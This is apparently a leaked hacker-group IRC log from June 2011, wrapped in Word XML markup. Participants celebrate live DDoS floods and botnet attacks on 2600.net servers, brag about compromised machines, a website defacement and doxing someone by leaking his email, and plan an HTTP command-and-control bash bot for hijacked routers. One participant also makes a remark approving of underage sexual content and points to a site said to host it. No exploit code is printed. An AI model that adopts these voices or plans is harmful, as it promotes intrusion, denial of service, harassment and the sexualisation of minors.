        <w:t>Jun 01 06:25:33 Topiary it's back Jun 01 06:25:48 storm its cause it gets nulled Jun 01 06:25:49 storm for 5 min Jun 01 06:26:23 storm lol Jun 01 06:26:35 storm thats the funnest shit ive done with 2 servers _ Jun 01 06:26:45 storm who woulda thought 3 ircds could die to 2 boxes Jun 01 06:27:13 Topiary well it's good taking out 2/3, watching them scramble to the 3rd, letting them come back, then fucking the 3rd while laying off the other 2 Jun 01 06:27:19 Topiary like playing with rats and switches Jun 01 06:27:37 storm haha Jun 01 06:27:41 storm i could drop all 3 at once Jun 01 06:27:45 storm if i wanted Jun 01 06:27:50 storm just take 2 more box logins Jun 01 06:28:05 storm but theres no fun in that ;&lt; Jun 01 06:28:29 Topiary * [Brainsturbator] (skully2012@71-23-43- 101.war.clearwire-wmx.net): Agent Skully Jun 01 06:28:29 Topiary * [Brainsturbator] #lulzsec #secnews #telephreak #2600 Jun 01 06:28:30 Topiary who is this?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:28:48 storm no idea Jun 01 06:28:58 Topiary we don't either, hmm Jun 01 06:30:51 storm Agent Skully Jun 01 06:30:55 storm better watch out Jun 01 06:31:00 storm hes an 4g3n+ Jun 01 06:31:46 joepie92 lolol Jun 01 06:31:47 joepie92 Since the hack, LulzSec has turned it attention towards patriot hacker Jester, the most prominent member of the anti- Wikileaks cyber-militia, who attacked WikiLeaks after the release of US diplomatic cables. Unsurprisingly, LulzSec claimed his hacks were "lame" before threatening an attack against long-running hacker magazine 2600. Jun 01 06:31:50 joepie92 jester gonna be mad Jun 01 06:31:54 joepie92 I R NO PART OF MILITIA Jun 01 06:31:56 joepie92 I R LONE WOLF Jun 01 06:32:09 Topiary &gt;claimed his hacks Jun 01 06:32:11 Topiary &gt;his hacks Jun 01 06:32:15 Topiary we actually claimed he did no hacks Jun 01 06:32:16 Topiary which he didn't Jun 01 06:32:24 Topiary please name one time Jester has hacked anything, I dare ya Jun 01 06:32:33 storm lol Jun 01 06:32:52 joepie92 I suppose you could call modding LOIC to collect IPs, hacking.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:33:02 joepie92 [/devilsadvocate[ Jun 01 06:33:03 joepie92 ]* Jun 01 06:42:18 lol lol xD Jun 01 06:42:26 lol i read on some sec site Jun 01 06:42:31 lol who has a j35t3r page Jun 01 06:42:44 lol wrote how someone "cracked LOIC and altered it" Jun 01 06:42:58 lol lol i was like "errr.... the src is pub lol" Jun 01 06:44:03 lol when all my brazillians get on im gonna dos them too :3 Jun 01 06:44:32 lol only 34 in channel :o pointless yet, wait for the brazillians get get online should have about 70/80 :D Jun 01 06:45:29 Topiary I snagged us some nice USAs the other day Jun 01 06:45:35 Topiary hopefully good net Jun 01 06:45:49 lol yeh :D Jun 01 06:46:14 lol those [NEW] in there are US installs too i think Jun 01 06:46:34 storm rofl Topiary Jun 01 06:46:37 storm your servers down Jun 01 06:46:52 Topiary damnit I was on collective Jun 01 06:46:56 Topiary and so are you &gt;:[ Jun 01 06:47:10 storm not uh Jun 01 06:47:12 storm im on djs Jun 01 06:47:15 storm i think Jun 01 06:47:18 Topiary no sir Jun 01 06:47:21 Topiary we're all on collective Jun 01 06:47:36 Topiary ohhhh shit Jun 01 06:47:41 Topiary you guys are, I'm on collective Jun 01 06:47:43 Topiary ffffffff Jun 01 06:48:05 storm lolllllllll Jun 01 06:48:10 storm lets switch servers then Jun 01 06:49:30 joepie92 cam someone explain to me why windows software running through WINE on puppy linux in a virtualbox instance runs faster than natively on the host windows system Jun 01 06:49:36 joepie92 :| Jun 01 06:49:38 joepie92 can* Jun 01 06:52:40 storm Topiary can you map?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:52:46 storm on collective Jun 01 06:52:56 Topiary * collective.2600.net ------------------------------ | Users: 204 (49.4%) Jun 01 06:52:56 Topiary * '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 01 06:52:56 Topiary * |- madjack.2600.net ------------------------- | Users: 99 (24.0%) Jun 01 06:52:56 Topiary * |- djslocker.2600.net ----------------------- | Users: 101 (24.5%) Jun 01 06:52:56 Topiary * '- services.2600.net ------------------------ | Users: 9 (2.2% Jun 01 06:53:01 storm so it worked Jun 01 06:53:03 storm bah!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:53:04 storm lol Jun 01 06:53:11 storm they definitely changed the server around Jun 01 06:54:21 lol what channel are you guys in over there :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:54:30 Topiary lulzsec Jun 01 06:54:33 Topiary and 2600 Jun 01 06:56:39 storm cant believe they stepped up their game Jun 01 06:56:41 storm lmao Jun 01 06:57:02 lol op me am parr0t xD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07:03:13 storm 07:01 -!- bottle_of_rum [~bottle_of@72.46.129.46] has quit [Ping timeout: 240 Jun 01 07:03:13 storm seconds] Jun 01 07:03:13 storm 07:01 -!- echo [~echo@pool-108-27-212- 254.nycmny.fios.verizon.net] has quit Jun 01 07:03:13 storm [Ping timeout: 240 seconds] Jun 01 07:03:13 storm 07:01 -!- RootBSD_ [~rootbsd@r00ted.com] has quit [Ping timeout: 240 seconds] Jun 01 07:03:13 storm 07:02 -!- bottle_of_rum [~bottle_of@72.46.129.46] has joined #2600 Jun 01 07:03:13 storm 07:02 &lt; storm&gt; uh oh Jun 01 07:03:13 storm 07:02 -!- isaac [~isaac@24.167.38.73] has quit [Ping timeout: 240 seconds] Jun 01 07:03:13 storm 07:02 -!- m0no [natas@c-75-67-212- 35.hsd1.ma.komcast.net] has quit [Quit: Jun 01 07:03:13 storm changing servers] Jun 01 07:03:14 storm 07:02 -!- ZadYree [~ZadY@ip-87.net-89-2- 31.rev.numericable.fr] has quit [Ping Jun 01 07:03:15 storm timeout: 240 seconds] Jun 01 07:03:16 storm 07:02 -!- warmonger [~hehe@108-65-79- 77.lightspeed.sntcca.sbcglobal.net] has Jun 01 07:03:16 storm quit [Ping timeout: 240 seconds] Jun 01 07:03:18 storm 07:02 &lt; storm&gt; magickal Jun 01 07:03:18 storm 07:02 -!- The_Blob [~blob@S010600c00cb01b8c.vs.shawcable.net] has quit [Ping Jun 01 07:03:19 lol lol @ Highest connection count: 802 (801 clients) (95744 connections received) Jun 01 07:03:20 storm timeout: 240 seconds] Jun 01 07:03:21 storm 07:03 &lt; storm&gt; magickal indeed Jun 01 07:03:22 storm 07:03 -!- WebDawg [~whoami@officialg0d.com] has quit [Ping timeout: 240 seconds] Jun 01 07:03:22 storm lmfao Jun 01 07:03:24 sabu its that sx Jun 01 07:03:26 sabu sex Jun 01 07:03:44 lol sbau you're the sex ;D Jun 01 07:03:57 Topiary well lawdy Jun 01 07:04:16 lol abusing 2600 is rather amusing Jun 01 07:04:35 storm lolz Jun 01 07:04:50 storm Flood completed, 254326485 packets sent, 447 seconds, 568963 packets/sec Jun 01 07:04:51 sabu lol Jun 01 07:04:58 sabu I wake up to storm packeting Jun 01 07:05:02 storm lol Jun 01 07:05:03 sabu and kayla excited Jun 01 07:05:04 sabu &lt;3 Jun 01 07:05:06 storm xD Jun 01 07:05:11 sabu what you niggas been doing without me Jun 01 07:05:20 storm owning 2600.net Jun 01 07:05:21 storm about it Jun 01 07:05:39 sabu jEa Jun 01 07:06:05 joepie92 lol Jun 01 07:06:15 joepie92 morning Sabu Jun 01 07:11:12 storm indeed Jun 01 07:11:15 storm morning Jun 01 07:11:45 sabu morning joepie Jun 01 07:11:50 sabu hows everyone doing?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:11:51 * Sabu gives channel operator status to [redacted] value Topiary lol Jun 01 07:12:17 storm nulled madjack Jun 01 07:12:19 storm again Jun 01 07:12:20 storm lol Jun 01 07:12:31 sabu lol Jun 01 07:12:39 sabu they're going to end up losing some servers Jun 01 07:13:12 sabu I want to own 2600 servers themselves Jun 01 07:14:21 Topiary that would be awesome Jun 01 07:16:42 sabu topiary my brother how are you Jun 01 07:17:34 storm Topiary watch for magickal splitz Jun 01 07:17:38 Topiary good Sabu, what's up?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:18:58 sabu nothing broscope just woke up tired as balls Jun 01 07:22:01 joepie92 my fucking god Jun 01 07:22:07 joepie92 evilworks raging out of his fucking skull Jun 01 07:22:16 Topiary what about?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:22:25 joepie92 earlier today he sajoined the entire network to #lounge Jun 01 07:22:29 joepie92 and then did a massive spam/highlight Jun 01 07:22:31 joepie92 of everyone in the channel Jun 01 07:22:40 joepie92 and consecutively got localkilled by me and owen Jun 01 07:22:45 joepie92 now like 10 mins ago Jun 01 07:22:48 joepie92 he starts raging in #opers Jun 01 07:22:52 joepie92 that he is missing some capabilities Jun 01 07:22:52 joepie92 as oper Jun 01 07:22:58 joepie92 and is apparently not in the operserv admin list anymoer Jun 01 07:23:05 joepie92 starts masshighlighting opers Jun 01 07:23:05 Topiary yeah remember that he killed both of us for simply disagreeing with him?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:23:10 joepie92 raging out of his skull Jun 01 07:23:15 joepie92 despite owen not even being fucking there Jun 01 07:23:16 Topiary in #reporter Jun 01 07:23:21 Topiary he's a hot-tempered child Jun 01 07:23:22 joepie92 and logic tells me that owen was the only person who could do that Jun 01 07:23:26 storm i remember owen Jun 01 07:23:43 joepie92 anyhow, after a localkill and some shouting back that he should calm the fuck down, he seems to be more calm now Jun 01 07:23:44 joepie92 -_- Jun 01 07:23:51 Topiary you know these chaps with IRC technical prowess have it covered in that area Jun 01 07:23:52 joepie92 "CAN'T YOU TAKE A JOKE?!?!" Jun 01 07:23:55 joepie92 seriously Jun 01 07:23:56 Topiary but outside of that, they're retarded Jun 01 07:24:02 joepie92 if you don't want shit to happen, then don't start shit yourself -_- Jun 01 07:24:14 joepie92 ugh Jun 01 07:24:30 joepie92 inb4 I get localkilled by evilworks again Jun 01 07:24:44 joepie92 crhist Jun 01 07:24:45 Topiary "agree with me or a z:line you" is evilworks' fodder Jun 01 07:24:45 joepie92 christ* Jun 01 07:24:48 joepie92 anyhow, /rant Jun 01 07:25:21 Topiary this will cheer you up; http://blogs.forbes.com/parmyolson/2011/05/31/interview-with-pbs-hackers-we- did-it-for-lulz-and-justice/ Jun 01 07:25:41 joepie92 lol, parmy is teh win Jun 01 07:26:06 Topiary it's fun to upset other journalists by giving parmy exclusives Jun 01 07:26:15 Topiary her original Tupac report got the most views of any Jun 01 07:26:18 joepie92 lool Jun 01 07:26:18 Topiary and it got tweeted by wikileaks Jun 01 07:26:21 joepie92 ye Jun 01 07:26:23 joepie92 and it got referenced Jun 01 07:26:25 joepie92 by all dutch news sources Jun 01 07:26:29 joepie92 also Jun 01 07:26:35 joepie92 inb4 raeg because it's poptart cat and not nyan cat Jun 01 07:26:46 Topiary over the last 6 months, we've probably given Parmy more views than she's had in her entire career Jun 01 07:27:23 Topiary still: http://i.imgur.com/DsgWI.jpg Jun 01 07:27:27 Topiary our greatest achievement to date?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:27:45 joepie92 lolol Jun 01 07:27:49 joepie92 nyancat in wsj Jun 01 07:28:05 joepie92 also, people help each other I guess :P Jun 01 07:28:13 joepie92 Parmy gets views, anon/lulzsec gets exposure Jun 01 07:28:23 joepie92 and notable sources :D Jun 01 07:28:42 Topiary Parmy has a friend over at WSJ, she's gonna ask him if they had a good time over the printing of nyan cat Jun 01 07:28:54 Topiary she's like our wonderful media outlet 0day Jun 01 07:29:01 joepie92 loool Jun 01 07:29:13 lol lololol Jun 01 07:29:28 Topiary Parmy "0day" Olson Jun 01 07:29:32 Topiary she's a nice lady Jun 01 07:30:13 joepie92 LulzSec also defaced the official PBS statement in response to the attack. PBS could not be reached for further comment. Jun 01 07:30:14 joepie92 lol Jun 01 07:30:19 Topiary ah yes Jun 01 07:30:19 joepie92 becauseyourfurthercommentpagewasdown.jpeg Jun 01 07:30:27 Topiary I believe that was "LOL FRONTLINE SUCKS COCKS" Jun 01 07:30:33 joepie92 ahaha Jun 01 07:30:38 Topiary http://pastehtml.com/view/avg12f6sz.html Jun 01 07:30:42 Topiary this used to be pbs.org/whiskey Jun 01 07:31:55 storm Nightmare966 NoName Jun 01 07:31:55 storm @ Jun 01 07:31:56 storm @LulzSec Lemme get this straight... You could do great things like ctaching pedos but you decide attack Sony ._.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:31:59 storm ROFLMFAO Jun 01 07:32:02 storm thats epic Jun 01 07:32:42 storm leave the paedos alone, they already haz it bad enough.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:32:51 Topiary it's actually true though, I dox'd a pedo once Jun 01 07:32:58 storm lol Jun 01 07:33:00 Topiary probably helped get him arrested Jun 01 07:33:08 storm yuck Jun 01 07:33:12 Topiary :( Jun 01 07:33:17 storm i hate anyone getting arrested Jun 01 07:33:21 Topiary well I never knew if he was arrested Jun 01 07:33:22 storm just a personal view of mine ;x Jun 01 07:33:28 Topiary didn't even know he was a pedo until I leaked his hotmail Jun 01 07:33:32 storm hahaha Jun 01 07:33:45 Topiary he had attachments of CP Jun 01 07:33:51 Topiary and chatted up young girls Jun 01 07:34:50 storm at least he had good taste Jun 01 07:34:51 storm ;x Jun 01 07:34:59 storm girls = way to be Jun 01 07:35:19 storm there are indefinite under age girls on motherless.com Jun 01 07:39:52 * storm see's everyone fapping Jun 01 07:43:35 lol :/ Jun 01 07:46:54 storm lol Jun 01 07:47:44 * lol helps Jun 01 07:48:53 storm OMG Jun 01 07:48:54 storm so Jun 01 07:49:01 storm my gigabit box i owned a few days ago Jun 01 07:49:06 storm has a publ;ic key to another one Jun 01 07:49:09 storm fucking owned Jun 01 07:49:09 storm ;x Jun 01 07:49:27 lol nice :D Jun 01 07:49:27 Topiary more cannons!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:49:39 Topiary you're definitely our LulzSec cannonfire officer Jun 01 07:49:46 lol 2xDATAFLOW Jun 01 07:49:54 Topiary kayla is our assassin/spy Jun 01 07:50:02 Topiary we dock in ports and she immerses = Jun 01 07:50:04 Topiary and eliminates Jun 01 07:50:10 lol i also bake cookies :3 Jun 01 07:50:52 lol currently 46 boats in the harbour Jun 01 07:51:16 lol * [ _]-70335 ([ _]-70335@HA-ek9.ljf.k5jhin.IP) Quit Jun 01 07:51:21 lol 45* Jun 01 07:54:07 * Topiary has quit (Ping timeout: 121 seconds) Jun 01 07:57:54 lol firing cannons @ collective.2600.net Jun 01 07:58:46 joepie92 stormi hate anyone getting arrested Jun 01 07:58:48 joepie92 agreed Jun 01 07:58:54 joepie92 last resort imo Jun 01 07:59:17 storm :] Jun 01 07:59:27 lol C:\Documents and Settings\kayla&gt;ping collective.2600.net Jun 01 07:59:27 lol Pinging collective.2600.net [208.111.35.75] with 32 bytes of data: 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Ping statistics for 208.111.35.75: Jun 01 07:59:27 lol Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Jun 01 07:59:27 lol C:\Documents and Settings\kayla&gt; Jun 01 07:59:30 lol looooooooooooool Jun 01 07:59:36 storm EWWWWWWWWW Jun 01 07:59:41 lol dos'd with 45 bots Jun 01 07:59:41 storm CMD PROMPT Jun 01 07:59:44 storm ZOMG Jun 01 07:59:46 storm I DIED Jun 01 07:59:50 lol lol Jun 01 07:59:53 storm lol Jun 01 07:59:53 storm :x Jun 01 07:59:56 lol :D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08:00:24 * joepie92 thinks kayla MUST have modded her terminal to look like cmd Jun 01 08:03:14 storm loll Jun 01 08:11:13 * Topiary (t@HA-31n.h6t.9puaba.IP) has joined #pure-elite Jun 01 08:12:48 joepie92 if you're bored Jun 01 08:12:49 joepie92 view- source:www.easyhits4u.com/index.cgi?warning=hai Jun 01 08:12:52 joepie92 er Jun 01 08:12:56 joepie92 http://www.easyhits4u.com/index.cgi?warning=hai Jun 01 08:13:11 lol whats tht ;p?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 08:13:13 * joepie92 smells XSS Jun 01 08:13:46 joepie92 :D Jun 01 08:14:12 storm hey kayla Jun 01 08:14:15 storm can i pm joo Jun 01 08:15:06 lol sure :D Jun 01 08:24:55 * voodoo has quit (Connection closed) Jun 01 08:36:38 * voodoo (voodoo@HA-32o.s8p.durho2.IP) has joined #pure- elite Jun 01 08:51:04 joepie92 some people Jun 01 08:51:05 joepie92 are so fucking stupid Jun 01 08:51:06 joepie92 "stupid" in the sense that they assume the current systems are the only way to go, that they will judge any system that works differently as "bad" or "inferior", and saying that you would be "throwing away hundreds of years of knowledge", ignoring the "tested systems" Jun 01 08:51:07 joepie92 and for ease of complaint, ignoring that those "tested systems" have fallen over and over again Jun 01 08:51:16 joepie92 http://www.quora.com/Is-the-cryptocurrency-Bitcoin- a-good-idea Jun 01 08:51:20 joepie92 read the top comment Jun 01 08:56:47 lol uname -a Jun 01 08:56:49 lol oops Jun 01 08:57:35 storm lol Jun 01 08:57:36 storm :D Jun 01 08:57:42 storm i do that a lot Jun 01 08:57:50 storm cause my terminals are transparent Jun 01 08:58:25 * Topiary has quit (Quit: sec)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09:03:10 joepie92 lol Jun 01 09:15:19 * Topiary (t@HA-d98.pu6.75e5ku.IP) has joined #pure-elite Jun 01 09:35:45 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure- elite Jun 01 09:35:52 * pwnsauce (pwnsauce@HA-pin.jre.pn6gun.IP) has joined #pure- elite Jun 01 09:35:58 * anonny is now known as kl0ps Jun 01 09:36:06 kl0ps hello o/ Jun 01 09:36:14 pwnsauce heu Jun 01 09:36:17 pwnsauce *hey Jun 01 09:36:54 pwnsauce whass happening?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 09:37:35 kl0ps nothing, all is fine,... perfect ;) Jun 01 09:37:36 kl0ps sup Jun 01 09:37:37 kl0ps ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 09:48:28 pwnsauce not much Jun 01 09:55:02 Topiary I'm celebration of our whiskey page I am now using a Moldova server location Jun 01 09:55:04 Topiary *In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10:04:10 joepie92 buyvm gone again Jun 01 10:08:57 -NickServ- This nickname is registered and protected. If it is your Jun 01 10:08:57 -NickServ- nick, type /msg NickServ IDENTIFY password. Otherwise, Jun 01 10:08:57 -NickServ- please choose a different nick.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 10:15:46 * kl0ps has quit (Connection closed) Jun 01 10:28:43 * kay (parr0t@HA-p7h.2se.thhlfj.IP) has joined #pure-elite Jun 01 10:29:40 * lol has quit (Ping timeout: 121 seconds) Jun 01 10:38:17 * kay is now known as lol Jun 01 10:55:11 * pwnsauce has quit (Ping timeout: 121 seconds)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11:09:22 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure- elite Jun 01 11:09:33 * anonny is now known as kl0ps Jun 01 11:31:49 * kl0ps has quit (Quit: Leaving)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12:13:58 * pwnsauce (pwnsauce@HA-q1a.9e1.pn6gun.IP) has joined #pure- elite Jun 01 12:19:19 pwnsauce :D\-&lt; Jun 01 12:19:25 pwnsauce :D|-&lt; Jun 01 12:19:28 pwnsauce :D/-&lt; Jun 01 12:19:34 Topiary Jun 01 12:19:39 Topiary _________________________ Jun 01 12:19:45 Topiary ____________________________________________________________________ Jun 01 12:19:54 Topiary 8=========================D Jun 01 12:20:03 Topiary your stick dude fell into a sea of cocks Jun 01 12:20:35 joepie92 lolol Jun 01 12:20:43 * joepie92 does some shameless plugging for bitcoin Jun 01 12:21:37 * Neuron (Neuron@HA-26h.345.a84vd3.IP) has joined #pure- elite Jun 01 12:21:40 neuron o/ Jun 01 12:23:05 joepie92 lolwat Jun 01 12:23:06 joepie92 guise Jun 01 12:23:06 joepie92 http://nf.dyndns.org/?poll=3 Jun 01 12:23:16 joepie92 I seriously got more bitcoin donations Jun 01 12:23:19 joepie92 than pioneer one Jun 01 12:23:56 neuron lmfao wow Jun 01 12:23:57 neuron nice Jun 01 12:24:07 joepie92 I googled the anonnews address Jun 01 12:24:08 joepie92 and that came up Jun 01 12:24:08 joepie92 xD Jun 01 12:26:10 neuron hmm Jun 01 12:26:16 neuron ping dosen't like to be a background process Jun 01 12:28:01 joepie92 lolol Jun 01 12:29:04 neuron lol: you on?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:29:12 lol yeh :D Jun 01 12:29:37 neuron talked to [redacted] about everything Jun 01 12:29:44 neuron building a cnc system for the busybox's Jun 01 12:29:52 neuron lul for bash bot :D XD Jun 01 12:30:01 neuron if you can send me that list of all of them that would be awesome Jun 01 12:30:03 [redacted] sup Jun 01 12:30:08 neuron hey [redacted] o/ Jun 01 12:30:33 [redacted] just woke up :] Jun 01 12:32:00 * lol has quit (A TLS packet with unexpected length was received.) Jun 01 12:32:11 * lol (parr0t@HA-678.11n.cc0br2.IP) has joined #pure-elite Jun 01 12:32:19 neuron wb lol Jun 01 12:32:28 lol :) Jun 01 12:32:31 lol ty &lt;333 Jun 01 12:32:37 neuron lol: do you have the list on you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:32:58 lol no it's on my netbook, i should be able to get it tonight Jun 01 12:33:04 neuron lol: Idk if you left but i was talking to [redacted] and we decided to work on a small cnc type bot with the busybox's Jun 01 12:33:07 neuron bashbot XD Jun 01 12:33:08 lol did many from tht other list work?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:33:18 neuron about 15-20 :/ Jun 01 12:33:39 lol the other list i have is just as old as tht Jun 01 12:33:49 lol the problem is tht range is dynamic Jun 01 12:34:01 lol so it has to be re scanned regulary Jun 01 12:34:08 lol i got some good boxes to scan from Jun 01 12:34:16 lol ill just scan the range again Jun 01 12:34:18 neuron thats fine. Can you rescan the range?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:34:24 lol yeh :) Jun 01 12:34:38 lol ill set some screen sessions up scanning later tonight :) Jun 01 12:34:54 neuron cool once we have the bot in place it won't matter what ip there on :) there just going to pull a command from a webserver every now and then Jun 01 12:35:15 lol :) Jun 01 12:35:30 lol i just had a hard time getting anything i compile to execute on them Jun 01 12:35:39 lol evenn such simple mips asm Jun 01 12:35:57 neuron yeah thats why im going the bash route XD i couldn't get anything to run on them as well Jun 01 12:36:08 lol i was hoping to just cross compile a kaiten but it's not tht simple hahahahaa Jun 01 12:36:25 lol Unexpected ) error all the time Jun 01 12:37:22 lol now if we could remote update them, we could modify a firmware Jun 01 12:37:35 lol but i dont think thats possible Jun 01 12:37:41 neuron nope Jun 01 12:37:42 [redacted] keep it simple Jun 01 12:37:44 [redacted] write the bot in bash Jun 01 12:37:48 [redacted] using HTTP for CnC Jun 01 12:37:50 lol but people have modified them Jun 01 12:37:55 lol i found one with php on once Jun 01 12:38:22 lol some of them have aspx scripts on them Jun 01 12:38:35 lol they're really weird things Jun 01 12:38:43 neuron yeah but the aspx scripts only workfor local Jun 01 12:38:46 lol but they only have like 2MB memory Jun 01 12:38:48 neuron intranet Jun 01 12:38:53 neuron so there 192 address Jun 01 12:38:57 pwnsauce hey hey Jun 01 12:39:03 neuron o/ hey pwnsauce Jun 01 12:39:24 pwnsauce whats up?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:39:27 pwnsauce kaiten botting?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:39:32 pwnsauce * MIPS router bottinh?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:39:33 pwnsauce ok Jun 01 12:39:45 pwnsauce Kayla - I have some good code here Jun 01 12:39:48 pwnsauce a HTTP bot Jun 01 12:39:57 pwnsauce now what we can do is try cross compile that Jun 01 12:40:06 pwnsauce else, have a perl bot we can convert to BASH Jun 01 12:40:08 pwnsauce or ASH Jun 01 12:40:18 pwnsauce * a HTTP perl bot Jun 01 12:40:29 neuron yup Jun 01 12:40:31 neuron MIPS bottin Jun 01 12:40:39 pwnsauce Ive been researching it Jun 01 12:40:44 pwnsauce can they run shell scripts?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
